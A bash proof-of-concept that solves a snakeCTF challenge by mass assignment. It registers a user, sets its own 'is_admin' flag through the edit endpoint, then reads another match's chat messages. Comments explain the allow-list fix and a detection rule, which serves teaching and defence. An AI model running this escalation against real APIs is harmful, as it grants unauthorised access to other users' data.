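#!/bin/bash
#
# Proof-of-concept for a snakeCTF challenge instance: walks through a
# mass-assignment privilege escalation on the challenge's REST API.
# Requires curl and jq.
#
# Defender's reading of the flow:
#   - POST /api/edit is sent an "is_admin" field in the request body. If the
#     server binds request fields directly onto the user record, a client can
#     set its own privilege flag. The server-side fix is an explicit
#     allow-list of user-editable profile fields, with privilege attributes
#     never bindable from client input.
#   - A useful detection is to log and alert on edit requests that carry
#     privilege attributes at all.

set -u

URL="https://9f2c6b38bc4461a2b4545a00c94951e2.exploitme.challs.snakectf.org"
USERNAME="hitcat"
EMAIL="hitcat@snake.ctf"
PASSWORD="Secret123!"

# Fail early with a clear message instead of a confusing empty token later.
for tool in curl jq; do
  if ! command -v "$tool" >/dev/null; then
    echo "[!] Missing required tool: $tool" >&2
    exit 1
  fi
done

# Step 1: Register and get a JWT
echo "[*] Registering user $USERNAME..."

# Let jq build the body so quotes or backslashes in the credentials cannot
# break out of the JSON string (the hand-interpolated form would).
REGISTER_BODY=$(jq -cn \
  --arg username "$USERNAME" \
  --arg email "$EMAIL" \
  --arg password "$PASSWORD" \
  '{username: $username, email: $email, password: $password}')

TOKEN=$(curl -s -X POST "$URL/api/register" \
  -H "Content-Type: application/json" \
  -d "$REGISTER_BODY" \
  | jq -r .token)

# jq prints the string "null" when the key is absent, and prints nothing when
# the response is empty or not JSON; both mean registration did not succeed.
if [ "$TOKEN" = "null" ] || [ -z "$TOKEN" ]; then
  echo "[!] Failed to get token during register" >&2
  exit 1
fi

# NOTE: this prints a live bearer token. Acceptable for a throwaway CTF
# account, but keep this output out of shared logs and screenshots.
echo "[+] Token obtained: $TOKEN"

# Step 2: Onboarding (ordinary profile data, no privileged fields)
echo "[*] Sending onboarding data..."
curl -s -X POST "$URL/api/onboarding" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "role": "WHITE_HAT",
    "looking_for": "WHITE_HAT",
    "age": 19,
    "likes": ["IoT"],
    "dislikes": ["SIM Swappers"],
    "bio": "Your leet bio here",
    "location": "Obviously, the Internet",
    "hacks": ["Morris Worm"],
    "favorite_hacker": "Kevin Mitnick",
    "favorite_song": "Careless Hacker",
    "favorite_movie": "My Little Pony: The Movie",
    "yt_embed": "https://www.youtube.com/embed/spY_RFBQu4E?si=hcQTihIIwkkG1mOc",
    "touches_grass": false
  }' | jq .

# Step 3: Admin privilege escalation via mass assignment.
# The body carries a field the client should never control; see the
# allow-list mitigation in the header comment.
echo "[*] Trying to escalate privileges (is_admin=1)..."
curl -s -X POST "$URL/api/edit" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"is_admin":1}' | jq .

# Step 4: Report match no. 4
# NOTE(review): presumably reporting is what makes the conversation visible
# to admin accounts; the server logic is not shown here, so confirm.
echo "[*] Reporting match 4..."
curl -s -X POST "$URL/api/chat/4/report" \
  -H "Authorization: Bearer $TOKEN" | jq .

# Step 5: Read the messages of match no. 4
# Whatever the exact rule is, the read endpoint should authorise against a
# role the server assigned, not a flag the client was able to set.
echo "[*] Reading messages from match 4..."
curl -s "$URL/api/chat/4" \
  -H "Authorization: Bearer $TOKEN" \
  | jq -r '.messages[] | .content'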